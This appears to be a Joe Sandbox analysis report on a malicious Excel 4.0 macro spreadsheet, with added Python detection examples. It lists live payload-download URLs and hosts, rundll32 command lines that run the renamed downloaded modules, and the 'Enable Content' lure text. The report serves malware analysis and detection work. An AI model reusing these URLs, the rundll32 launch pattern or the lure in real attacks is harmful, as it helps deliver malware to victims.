Analysis Report Complaint-1992179913-02182021.xls

Overview

General Information

Sample Name: Complaint-1992179913-02182021.xls
Analysis ID: 356738
MD5: b2c46df91cfe891f61af65277461b32b
SHA1: fd329e179663a40c31f5c567228a59349928a6a5
SHA256: 3b9790a911cff3e1572608f3cc377a3776c63014c4230eebc46b0a220f22b1f5

Detection

Verdict: Hidden Macro 4.0
Score: 84 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Document contains embedded VBA macros
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara signature match
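
The "Hidden Macro 4.0" verdict and the "Yara detected hidden Macro 4.0 in Excel" signature rest on one structural fact about the file: the workbook contains an Excel 4.0 (XLM) macro sheet whose visibility flag is set to hidden or very hidden, so the victim sees only the "Enable Editing / Enable Content" decoy sheet. The following triage check is an added example written for this page, not Joe Sandbox's or the Yara rule's own code. It walks a BIFF8 record stream and reports BoundSheet8 records ([MS-XLS] 2.4.28: 4-byte stream offset, 2-bit hsState, 1-byte sheet type, short string name) that describe a non-visible macro sheet. The byte stream it parses is constructed inline to have that shape; it is not extracted from the analysed sample.

```python
"""Find hidden Excel 4.0 (XLM) macro sheets in a BIFF8 Workbook stream.

Added example for this report, not Joe Sandbox code. The BoundSheet8 layout
follows [MS-XLS] 2.4.28. SAMPLE_STREAM below is constructed for the demo.
"""
import struct

BOUNDSHEET8 = 0x0085
SHEET_TYPES = {0x00: "worksheet", 0x01: "excel4-macro", 0x02: "chart", 0x06: "vba-module"}
VISIBILITY = {0: "visible", 1: "hidden", 2: "very-hidden"}  # hsState; 2 cannot be unhidden from the Excel UI


def iter_records(stream: bytes):
    """Yield (record_type, payload) from a BIFF record stream: 2-byte type, 2-byte length, body."""
    pos = 0
    while pos + 4 <= len(stream):
        rtype, rlen = struct.unpack_from("<HH", stream, pos)
        pos += 4
        yield rtype, stream[pos:pos + rlen]
        pos += rlen


def parse_boundsheet8(payload: bytes) -> dict:
    """Decode one BoundSheet8 body: lbPlyPos, hsState (low 2 bits), dt (next byte), ShortXLUnicodeString name."""
    lb_ply_pos, grbit = struct.unpack_from("<IH", payload, 0)
    hs_state = grbit & 0x03          # 0 visible, 1 hidden, 2 very hidden
    dt = (grbit >> 8) & 0xFF         # 0x01 = Excel 4.0 macro sheet
    cch = payload[6]
    f_high_byte = payload[7] & 0x01  # 1 = UTF-16LE characters, 0 = 8-bit characters
    raw = payload[8:8 + (cch * 2 if f_high_byte else cch)]
    name = raw.decode("utf-16-le" if f_high_byte else "latin-1")
    return {"offset": lb_ply_pos, "visibility": VISIBILITY.get(hs_state, "unknown"),
            "type": SHEET_TYPES.get(dt, f"unknown(0x{dt:02x})"), "name": name}


def find_hidden_macro_sheets(stream: bytes) -> list:
    """Return every BoundSheet8 entry that is an XLM macro sheet and is not visible."""
    hits = []
    for rtype, payload in iter_records(stream):
        if rtype != BOUNDSHEET8:
            continue
        sheet = parse_boundsheet8(payload)
        if sheet["type"] == "excel4-macro" and sheet["visibility"] != "visible":
            hits.append(sheet)
    return hits


def make_boundsheet8(offset: int, hs_state: int, dt: int, name: str) -> bytes:
    """Build a BoundSheet8 record; used only to construct the sample stream below."""
    body = struct.pack("<IH", offset, (dt << 8) | hs_state) + bytes([len(name), 0]) + name.encode("latin-1")
    return struct.pack("<HH", BOUNDSHEET8, len(body)) + body


# Constructed sample: a visible decoy worksheet followed by a very-hidden XLM macro sheet,
# the shape behind a "Hidden Macro 4.0" verdict. BOF/EOF bodies are left empty for brevity.
SAMPLE_STREAM = (
    struct.pack("<HH", 0x0809, 0)                    # BOF
    + make_boundsheet8(0x1000, 0, 0x00, "Sheet1")    # visible worksheet (the decoy)
    + make_boundsheet8(0x2000, 2, 0x01, "Macro1")    # very-hidden Excel 4.0 macro sheet
    + struct.pack("<HH", 0x000A, 0)                  # EOF
)

if __name__ == "__main__":
    for hit in find_hidden_macro_sheets(SAMPLE_STREAM):
        print(f"{hit['name']!r}: {hit['visibility']} {hit['type']} at stream offset 0x{hit['offset']:x}")
```

To run this against a real .xls, first pull the "Workbook" stream out of the OLE2 container (for example with olefile: `OleFileIO(path).openstream("Workbook").read()`) and pass those bytes; oletools' olevba additionally decodes the XLM formulas (EXEC, the urlmon call) that the signatures above name.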

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1084 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2328 cmdline: rundll32 ..\JDFR.hdfgr,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2524 cmdline: rundll32 ..\JDFR.hdfgr1,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2684 cmdline: rundll32 ..\JDFR.hdfgr2,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2804 cmdline: rundll32 ..\JDFR.hdfgr3,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2948 cmdline: rundll32 ..\JDFR.hdfgr4,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: Complaint-1992179913-02182021.xls
Rule: SUSP_EnableContent_String_Gen (author: Florian Roth)
Description: Detects suspicious string that asks to enable active content in Office Doc
Matched strings:
  • $e1 "Enable Editing" at 0xadf2, 0xae3c, 0x158cc, 0x15916, 0x20083, 0x200cd
  • $e2 "Enable Content" at 0xae5a, 0x15934, 0x200eb

Source: Complaint-1992179913-02182021.xls
Rule: JoeSecurity_HiddenMacro (author: Joe Security)
Description: Yara detected hidden Macro 4.0 in Excel

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Rule authors: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team
Source: Process started
  • Command: rundll32 ..\JDFR.hdfgr,DllRegisterServer
  • CommandLine: rundll32 ..\JDFR.hdfgr,DllRegisterServer
  • CommandLine|base64offset|contains: ]
  • Image: C:\Windows\System32\rundll32.exe
  • NewProcessName: C:\Windows\System32\rundll32.exe
  • OriginalFileName: C:\Windows\System32\rundll32.exe
  • ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
  • ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
  • ParentProcessId: 1084
  • ProcessCommandLine: rundll32 ..\JDFR.hdfgr,DllRegisterServer
  • ProcessId: 2328
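
The Sigma match above fires on the parent/child relationship alone (an Office binary spawning rundll32.exe). A second, independent signal in the same event is the command line itself: rundll32 is asked to load a module with a non-DLL extension from a relative path and call DllRegisterServer, which is the downloader renaming its payload to dodge extension-based controls. The following detection logic is an added example, not the Sigma rule's published code or anything from Joe Sandbox. It evaluates process-creation events with the field names the match above lists (Image, ParentImage, CommandLine, ProcessId) and raises both findings. The events are constructed to mirror this report's process tree; the Office process's parent is not recorded in the report and is assumed to be explorer.exe for the sample.

```python
"""Office-spawns-shell plus rundll32-odd-module detection over process-creation events.

Added example for this report, not Sigma or Joe Sandbox code. SAMPLE_EVENTS is
constructed from the report's process tree; the EXCEL.EXE parent is an assumption.
"""
import ntpath
import re
from typing import Optional

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "msaccess.exe",
                 "mspub.exe", "outlook.exe", "eqnedt32.exe"}
# Child images the "Office Product Spawning Windows Shell" idea covers (shells and LOLBins).
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "sh.exe", "bash.exe",
                "scrcons.exe", "schtasks.exe", "regsvr32.exe", "hh.exe", "wmic.exe", "mshta.exe",
                "rundll32.exe", "msiexec.exe", "forfiles.exe", "scriptrunner.exe", "certutil.exe"}

# rundll32[.exe] <module>,<export>; the module token may be a relative path such as ..\JDFR.hdfgr
RUNDLL32_RE = re.compile(
    r'^\s*(?:"?[^"\s]*rundll32(?:\.exe)?"?)\s+"?(?P<module>[^\s",]+)"?\s*,\s*(?P<export>\w+)', re.I)


def basename_lower(path: str) -> str:
    """Case-folded file name of a Windows path (ntpath handles backslashes on any OS)."""
    return ntpath.basename(path).lower()


def office_spawning_shell(event: dict) -> bool:
    """Sigma logic: parent is an Office product and the child is a known shell/LOLBin."""
    return (basename_lower(event.get("ParentImage", "")) in OFFICE_IMAGES
            and basename_lower(event.get("Image", "")) in SHELL_IMAGES)


def rundll32_odd_module(event: dict) -> Optional[dict]:
    """Flag rundll32 calling DllRegisterServer on a module whose extension is not .dll."""
    if basename_lower(event.get("Image", "")) != "rundll32.exe":
        return None
    m = RUNDLL32_RE.match(event.get("CommandLine", ""))
    if not m:
        return None
    module, export = m.group("module"), m.group("export")
    ext = ntpath.splitext(module)[1].lower()
    if export.lower() == "dllregisterserver" and ext != ".dll":
        return {"module": module, "export": export, "extension": ext or "(none)"}
    return None


def evaluate(events: list) -> list:
    """Return (ProcessId, finding) tuples for every event that matches either check."""
    findings = []
    for ev in events:
        if office_spawning_shell(ev):
            findings.append((ev["ProcessId"], "office_spawned_shell"))
        odd = rundll32_odd_module(ev)
        if odd:
            findings.append((ev["ProcessId"], f"rundll32_nondll_module:{odd['module']}"))
    return findings


# Constructed events modelled on the report (PIDs 1084, 2328 and 2524 are the report's).
SAMPLE_EVENTS = [
    {"ProcessId": 1084, "Image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",  # assumption: not recorded in the report
     "CommandLine": r"'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding"},
    {"ProcessId": 2328, "Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "CommandLine": r"rundll32 ..\JDFR.hdfgr,DllRegisterServer"},
    {"ProcessId": 2524, "Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "CommandLine": r"rundll32 ..\JDFR.hdfgr1,DllRegisterServer"},
    # Benign control: a service host running a genuine .dll through rundll32.
    {"ProcessId": 3000, "Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]

if __name__ == "__main__":
    for pid, finding in evaluate(SAMPLE_EVENTS):
        print(pid, finding)
```

The two checks are deliberately independent: the parent/child rule catches the technique even when the payload keeps a .dll name, and the command-line rule catches the renamed-module trick even when the parent is something other than Office (for example a second-stage launched from a temp directory).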

Signature Overview

AV Detection:

Antivirus detection for URL or domain
  • Source: http://pathinanchilearthmovers.com/eznwcdhx/44250659496064800000.dat (Avira URL Cloud label: malware)

Compliance:

Uses new MSVCR Dlls
  • Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; file opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Uses secure TLS version for HTTPS connections
  • Source: HTTPS traffic detected: 138.36.237.100:443 -> 192.168.2.22:49168, version: TLS 1.2

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)
  • Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll, origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
  • Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; process created: C:\Windows\System32\rundll32.exe

Networking:

Potential document exploit detected (performs DNS queries)
  • Source: global traffic; DNS query: rzminc.com
  • Source: DNS traffic detected: queries for rzminc.com
Potential document exploit detected (unknown TCP traffic)
  • Source: global traffic; TCP traffic: 192.168.2.22:49168 -> 138.36.237.100:443
  • Source: global traffic; TCP traffic: 192.168.2.22:49165 -> 72.52.227.180:80
IP address seen in connection with other malware
  • Source: Joe Sandbox View; IP address: 138.36.237.100
  • Source: Joe Sandbox View; IP address: 68.66.216.42
JA3 SSL client fingerprint seen in connection with other malware
  • Source: Joe Sandbox View; JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Potential document exploit detected (performs HTTP gets)
  • GET /xklyulyijvn/44250659496064800000.dat HTTP/1.1 (Host: rzminc.com)
  • GET /eznwcdhx/44250659496064800000.dat HTTP/1.1 (Host: pathinanchilearthmovers.com)
  • GET /xjzpfwc/44250659496064800000.dat HTTP/1.1 (Host: jugueterialatorre.com.ar)
  • GET /fdzgprclatqo/44250659496064800000.dat HTTP/1.1 (Host: rzminc.com)
  • GET /otmchxmxeg/44250659496064800000.dat HTTP/1.1 (Host: biblicalisraeltours.com)
  All five requests carry identical headers: Accept: */*; UA-CPU: AMD64; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Connection: Keep-Alive.
Uses a known web browser user agent for HTTP communication
  • The User-Agent above is the Internet Explorer compatibility string that WinINet sends on this Windows 7 x64 host. Together with the URLDownloadToFileA origin and the cache entry below, it points to the XLM macro downloading through urlmon rather than to any browser session. The same file name (44250659496064800000.dat) requested from four hosts in turn is the fallback list of a multi-URL downloader: treat every host as an indicator even though only pathinanchilearthmovers.com is flagged by Avira.
  • Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; file created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ (the WinINet cache directory)
Strings found in rundll32.exe memory
  These are stock strings from Microsoft components mapped into rundll32.exe, not attacker infrastructure; the URL tables later in the report mark none of them malicious.
  • Dumps 00000004.00000002.2141685711.0000000001B30000, 00000005.00000002.2135628260.0000000001C00000, 00000006.00000002.2126075377.0000000001C00000, 00000007.00000002.2123580345.0000000001B30000:
      • Please visit http://www.hotmail.com/oe to learn more. (equals www.hotmail.com, Hotmail)
      • http://investor.msn.com
      • http://investor.msn.com/
      • http://www.hotmail.com/oe
      • http://www.msnbc.com/news/ticker.txt
  • Dumps 00000004.00000002.2141875808.0000000001D17000, 00000005.00000002.2135776075.0000000001DE7000, 00000006.00000002.2127097102.0000000001DE7000, 00000007.00000002.2123768215.0000000001D17000, 00000008.00000002.2117781328.0000000001DA7000:
      • http://localizability/practices/XML.asp
      • http://localizability/practices/XMLConfiguration.asp
      • http://www.icra.org/vocabulary/.
  • Dumps 00000004.00000002.2141875808.0000000001D17000, 00000005.00000002.2135776075.0000000001DE7000, 00000006.00000002.2127097102.0000000001DE7000, 00000007.00000002.2123768215.0000000001D17000:
      • http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      • http://windowsmedia.com/redir/services.asp?WMPFriendly=true
  • Dump 00000007.00000002.2123580345.0000000001B30000:
      • http://www.windows.com/pctv.
Uses secure TLS version for HTTPS connections
  • Source: network traffic detected: HTTP traffic on port 443 -> 49168 and 49168 -> 443
  • Source: HTTPS traffic detected: 138.36.237.100:443 -> 192.168.2.22:49168, version: TLS 1.2 (138.36.237.100 is jugueterialatorre.com.ar in the Contacted Domains table)
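
The HTTP requests in this section are the most reusable part of the report: five URLs, four hosts, one file name. The script below is an added example, not Joe Sandbox output, showing how to turn such request records into a hunting set. It parses raw HTTP/1.1 request text (request line followed by headers), groups requests by requested file name so that the fallback chain becomes visible, and compiles a proxy-log regex that matches either the known hosts or the shared file name on any host. The request strings are re-typed from the GET lines above with CRLF between headers; HOST_TO_IP is copied from the report's Contacted Domains table.

```python
"""Network IOC extraction from the HTTP requests recorded in this report.

Added example, not Joe Sandbox code. RAW_REQUESTS re-types the report's five
GET requests; HOST_TO_IP comes from the report's Contacted Domains table.
"""
import re
from collections import defaultdict

COMMON_HEADERS = (
    "Accept: */*\r\nUA-CPU: AMD64\r\nAccept-Encoding: gzip, deflate\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; "
    ".NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; "
    ".NET4.0C; .NET4.0E)\r\nConnection: Keep-Alive\r\n"
)

RAW_REQUESTS = [
    "GET /xklyulyijvn/44250659496064800000.dat HTTP/1.1\r\n" + COMMON_HEADERS + "Host: rzminc.com\r\n\r\n",
    "GET /eznwcdhx/44250659496064800000.dat HTTP/1.1\r\n" + COMMON_HEADERS + "Host: pathinanchilearthmovers.com\r\n\r\n",
    "GET /xjzpfwc/44250659496064800000.dat HTTP/1.1\r\n" + COMMON_HEADERS + "Host: jugueterialatorre.com.ar\r\n\r\n",
    "GET /fdzgprclatqo/44250659496064800000.dat HTTP/1.1\r\n" + COMMON_HEADERS + "Host: rzminc.com\r\n\r\n",
    "GET /otmchxmxeg/44250659496064800000.dat HTTP/1.1\r\n" + COMMON_HEADERS + "Host: biblicalisraeltours.com\r\n\r\n",
]

HOST_TO_IP = {  # from the report's Contacted Domains table
    "rzminc.com": "72.52.227.180",
    "pathinanchilearthmovers.com": "162.241.80.6",
    "jugueterialatorre.com.ar": "138.36.237.100",
    "biblicalisraeltours.com": "68.66.216.42",
}


def parse_request(raw: str) -> dict:
    """Split one raw HTTP request into method, path, version and a lower-cased header dict."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version, "headers": headers}


def build_iocs(raw_requests: list, host_to_ip: dict) -> dict:
    """Collect URLs, hosts and IPs, and expose file names fetched from more than one host."""
    urls, hosts, by_filename = [], set(), defaultdict(list)
    for raw in raw_requests:
        req = parse_request(raw)
        host = req["headers"]["host"]
        urls.append(f"http://{host}{req['path']}")
        hosts.add(host)
        by_filename[req["path"].rsplit("/", 1)[-1]].append(host)
    ips = {host_to_ip[h] for h in hosts if h in host_to_ip}
    # One file name requested from several hosts in sequence is the retry/fallback
    # behaviour of a multi-URL downloader: every host in the chain is an indicator.
    chains = {fn: sorted(set(hs)) for fn, hs in by_filename.items() if len(set(hs)) > 1}
    return {"urls": urls, "hosts": sorted(hosts), "ips": sorted(ips), "chains": chains}


def hunting_regex(iocs: dict) -> re.Pattern:
    """Proxy-log regex: any known host, or any host serving one of the chain file names."""
    parts = []
    if iocs["hosts"]:
        parts.append("(?:" + "|".join(re.escape(h) for h in iocs["hosts"]) + ")")
    if iocs["chains"]:
        parts.append("/(?:" + "|".join(re.escape(fn) for fn in iocs["chains"]) + r")(?:\?|$)")
    return re.compile("|".join(parts), re.I)


if __name__ == "__main__":
    iocs = build_iocs(RAW_REQUESTS, HOST_TO_IP)
    print(iocs)
    print(hunting_regex(iocs).pattern)
```

The file-name branch of the regex is what catches the next campaign wave: the hosts rotate, but a downloader that keeps the same payload name across its fallback list is found on hosts the sandbox never saw.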

System Summary:

Found malicious Excel 4.0 Macro
  • Source: Complaint-1992179913-02182021.xls; initial sample: urlmon (the macro references urlmon.dll, the library exporting the URLDownloadToFileA call recorded under Software Vulnerabilities)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
  • Screenshot 4, OCR text (garbled by OCR): Enable Editing, please click Enabk 14 from the yellow bar above f y-t."|| I xa I 15 " lnn|| I F?
  • Screenshot 8, OCR text (garbled by OCR): Enable Editing, please click Enabli " ' ' 14 from the yellow bar above RunDLL |~| 15 16 Therewas
  • Document image extraction 2, OCR text: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
  • Document image extraction 2, OCR text: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
  • Document image extraction 8, OCR text: Enable Editing from the yellow bar above @Once You have Enable Editing, please click Enable Conten
  • Document image extraction 8, OCR text: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? m You are using IDS or And
Found Excel 4.0 Macro with suspicious formulas
  • Source: Complaint-1992179913-02182021.xls; initial sample: EXEC (the Excel 4.0 function that starts a program; it accounts for the five rundll32.exe children in the process tree)
Document contains embedded VBA macros
  • Source: Complaint-1992179913-02182021.xls; OLE indicator, VBA macros: true
Yara signature match
  • Source: Complaint-1992179913-02182021.xls, type: SAMPLE; matched rule: SUSP_EnableContent_String_Gen (date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research)
Observations without a named signature in this extract
  • Source: rundll32.exe memory dumps 00000004.00000002.2141685711.0000000001B30000, 00000005.00000002.2135628260.0000000001C00000, 00000006.00000002.2126075377.0000000001C00000, 00000007.00000002.2123580345.0000000001B30000; binary or memory string: .VBPud<_
  • Classification engine label: mal84.expl.evad.winXLS@11/13@6/4
  • EXCEL.EXE file created: C:\Users\user\Desktop\76DE0000
  • EXCEL.EXE file created: C:\Users\user\AppData\Local\Temp\CVRCE17.tmp
  • Source: Complaint-1992179913-02182021.xls; OLE indicator, Workbook stream: true
  • EXCEL.EXE file read: C:\Users\desktop.ini
  • EXCEL.EXE key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
  • Process created (source unknown): C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr,DllRegisterServer
  • Process created (source unknown): C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
  • Process created (source unknown): C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr,DllRegisterServer
  • Process created (source unknown): C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr1,DllRegisterServer
  • Process created (source unknown): C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr2,DllRegisterServer
  • Process created (source unknown): C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr3,DllRegisterServer
  • Process created (source unknown): C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr4,DllRegisterServer
  • Process created by EXCEL.EXE: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr,DllRegisterServer
  • Process created by EXCEL.EXE: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr1,DllRegisterServer
  • Process created by EXCEL.EXE: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr2,DllRegisterServer
  • Process created by EXCEL.EXE: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr3,DllRegisterServer
  • Process created by EXCEL.EXE: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr4,DllRegisterServer
  • C:\Windows\System32\rundll32.exe automated click: OK (five times, one per rundll32.exe instance). Read together with the "RunDLL ... There was" text OCR'd from screenshot 8, this is consistent with rundll32.exe raising its "There was a problem starting" dialog for each module, i.e. the downloaded payload did not execute in this run, which would also explain why no malware configuration was extracted.
  • Window Recorder: more than 3 window changes detected
  • EXCEL.EXE key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
  • EXCEL.EXE file opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
  • Process information set: NOOPENFILEERRORBOX (EXCEL.EXE: 26 times; rundll32.exe: 5 times)

HIPS / PFW / Operating System Protection Evasion:

Yara detected hidden Macro 4.0 in Excel
  • Source: Yara match; file source: Complaint-1992179913-02182021.xls, type: SAMPLE

Mitre Att&ck Matrix

Techniques matched by the report's signatures, by tactic (the digits in parentheses are the numeric markers the report attaches to each matched technique, reproduced as-is; all other cells of the matrix are unmatched placeholder entries):

Tactic | Matched techniques
Execution | Scripting (21), Exploitation for Client Execution (23)
Privilege Escalation | Process Injection (1)
Defense Evasion | Masquerading (1), Disable or Modify Tools (1), Rundll32 (1), Process Injection (1), Scripting (21)
Discovery | File and Directory Discovery (1), System Information Discovery (2)
Command and Control | Encrypted Channel (2), Non-Application Layer Protocol (2), Application Layer Protocol (13), Ingress Tool Transfer (2)

No technique was matched under Initial Access, Persistence, Credential Access, Lateral Movement, Collection, Exfiltration, Network Effects, Remote Service Effects or Impact.

Behavior Graph

(The process/signature/network graph is an image in the original report and is not reproduced here.)

Screenshots

(Screenshot thumbnails are images in the original report; the OCR text extracted from screenshots 4 and 8 is listed under System Summary.)

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample: no antivirus matches
Dropped Files: no antivirus matches
Unpacked PE Files: no antivirus matches

Domains

Source | Detection | Scanner | Label
rzminc.com | 1% | Virustotal | (no label)

URLs

Source | Detection | Scanner | Label
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
http://rzminc.com/fdzgprclatqo/44250659496064800000.dat | 0% | Avira URL Cloud | safe
http://jugueterialatorre.com.ar/xjzpfwc/44250659496064800000.dat | 0% | Avira URL Cloud | safe
http://biblicalisraeltours.com/otmchxmxeg/44250659496064800000.dat | 0% | Avira URL Cloud | safe
http://pathinanchilearthmovers.com/eznwcdhx/44250659496064800000.dat | 100% | Avira URL Cloud | malware
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
http://rzminc.com/xklyulyijvn/44250659496064800000.dat | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
rzminc.com | 72.52.227.180 | true | false | (none) | unknown
biblicalisraeltours.com | 68.66.216.42 | true | false | (none) | unknown
crt.sectigo.com | 91.199.212.52 | true | false | (none) | unknown
jugueterialatorre.com.ar | 138.36.237.100 | true | false | (none) | unknown
pathinanchilearthmovers.com | 162.241.80.6 | true | false | (none) | unknown

crt.sectigo.com is the certificate authority's AIA/CRL host and is contacted as a side effect of the TLS 1.2 handshake with 138.36.237.100; it is not part of the download chain and should not be listed as an indicator.

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://rzminc.com/fdzgprclatqo/44250659496064800000.dat | false | Avira URL Cloud: safe | unknown
http://jugueterialatorre.com.ar/xjzpfwc/44250659496064800000.dat | false | Avira URL Cloud: safe | unknown
http://biblicalisraeltours.com/otmchxmxeg/44250659496064800000.dat | false | Avira URL Cloud: safe | unknown
http://pathinanchilearthmovers.com/eznwcdhx/44250659496064800000.dat | true | Avira URL Cloud: malware | unknown
http://rzminc.com/xklyulyijvn/44250659496064800000.dat | false | Avira URL Cloud: safe | unknown

Only one of the five payload URLs carries a malicious label, yet all five request the same file name from the same macro; the "false" entries reflect reputation coverage, not benign content.

URLs from Memory and Binaries

Source memory dumps (all rundll32.exe):
  • Set A: 00000004.00000002.2141685711.0000000001B30000, 00000005.00000002.2135628260.0000000001C00000, 00000006.00000002.2126075377.0000000001C00000, 00000007.00000002.2123580345.0000000001B30000
  • Set B: 00000004.00000002.2141875808.0000000001D17000, 00000005.00000002.2135776075.0000000001DE7000, 00000006.00000002.2127097102.0000000001DE7000, 00000007.00000002.2123768215.0000000001D17000
  • Set C: Set B plus 00000008.00000002.2117781328.0000000001DA7000

Name | Source | Malicious | Antivirus Detection | Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | Set B | false | (none) | high
http://www.windows.com/pctv. | 00000007.00000002.2123580345.0000000001B30000 | false | (none) | high
http://investor.msn.com | Set A | false | (none) | high
http://www.msnbc.com/news/ticker.txt | Set A | false | (none) | high
http://www.icra.org/vocabulary/. | Set C | false | URL Reputation: safe | unknown
http://investor.msn.com/ | Set A | false | (none) | high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | Set B | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | Set A | false | (none) | high

                        Contacted IPs


                        Public

IP              Domain   Country        ASN    ASN Name             Malicious
162.241.80.6    unknown  United States  46606  UNIFIEDLAYER-AS-1US  false
138.36.237.100  unknown  Argentina      27823  DattateccomAR        false
68.66.216.42    unknown  United States  55293  A2HOSTINGUS          false
72.52.227.180   unknown  United States  32244  LIQUIDWEBUS          false

                        General Information

                        Joe Sandbox Version:31.0.0 Emerald
                        Analysis ID:356738
                        Start date:23.02.2021
                        Start time:15:49:12
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 6m 28s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:Complaint-1992179913-02182021.xls
                        Cookbook file name:defaultwindowsofficecookbook.jbs
                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:10
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
